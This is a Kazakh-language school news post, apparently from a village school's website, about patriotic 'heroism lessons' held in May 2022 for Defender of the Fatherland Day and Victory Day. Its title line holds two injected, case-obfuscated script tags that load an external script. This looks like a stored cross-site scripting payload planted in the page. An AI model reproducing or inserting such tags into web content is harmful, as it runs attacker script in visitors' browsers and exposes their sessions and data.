Бірыңғай ерлік сабақтары<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

06.05.2022

2022 жылғы 6 мамырда "Приречное ауылының жалпы білім беретін мектебі" КММ – де ҚР ҚК құрылуының 30 жылдығын және Жеңістің 77 жылдығын мерекелеу қарсаңында  бірыңғай ерлік сабақтары өтті. 
Іс - шараның негізгі мақсаттары: жастарды өз Отанына деген патриоттық сезімге тәрбиелеу, өткен ерліктер үшін мақтаныш сезімін тәрбиелеу, Отаны Қазақстан Республикасын қорғауға дайындықты қалыптастыру. Аталған іс-шарада оқушылар патриоттық роликтерді, тарихи ақпараттан тұратын презентацияларды көрді, сондай-ақ Отан қорғаушылар күніне, Жеңіс күніне арналған тақырыптық өлеңдерді оқыды. Іс-шара барысында оқушылар қызығушылық танытып, сұрақтарына жауап алды. Осылайша, іс-шара жастардың азаматтық ұстанымын арттыруға ықпал етті.

      

Просмотров: 497


Пікір қосу



Деректерді қолтаңбаға қосу